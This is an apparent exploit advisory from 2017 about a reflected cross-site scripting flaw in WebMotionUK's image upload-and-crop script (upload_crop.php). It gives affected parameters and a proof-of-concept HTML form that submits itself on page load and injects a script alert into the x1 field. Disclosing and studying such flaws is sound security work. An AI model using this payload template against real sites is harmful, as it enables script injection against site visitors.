WebMotionUK CMS Reflected Cross site scripting(xss) Vulnerability

Published
Credit
Risk
2017.07.26
Ashiyane Digital Security Team
Low
CWE
CVE
Local
Remote
CWE-79
N/A
No
Yes

# Exploit Title: WebMotionUK CMS Reflected Cross site scripting(xss) Vulnerability
# Date: July 25, 2017
# Author: Ashiyane Digital Security Team
# Vendor Homepage : http://www.webmotionuk.com/
# Download Link :
http://www.webmotionuk.com/php-jquery-image-upload-and-crop/
# Version : Ver 1.2 & Ver 1.0
# CWE : 79
# Category: Web Application
# Tested On : Windows 10 / Chrome
______________________

Vulnerability FILE :

upload_crop.php
______________________

Vulnerability Method and Variable:

POST / x1,x2,y1,y2,w,idp and file_extp
______________________

Vulnerability Path :

http://localhost/[PATH]/upload_crop.php
______________________

Vulnerability code and Exploit:

<html>
<body onload="document.exploit.submit()">
<form name="thumbnail" action="http://localhost/[PATH]/upload_crop.php"
method="post">
<input type="hidden" name="x1" value="'/><script>alert(1)</script>"
id="x1" />
<input type="hidden" name="y1" value="" id="y1" />
<input type="hidden" name="x2" value="" id="x2" />
<input type="hidden" name="y2" value="" id="y2" />
<h2>Ancho</h2>
<input type="text" name="w" value="" id="w" /><br />

<h2>Ancho</h2>
<input type="text" name="h" value="" id="h" /><br />
<input type='hidden' name='idp' value=''/>
<input type='hidden' name='file_extp' value=''/><br />

</form>
</body>
</html>
_____________________________________


__________

HackFanS
__________


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com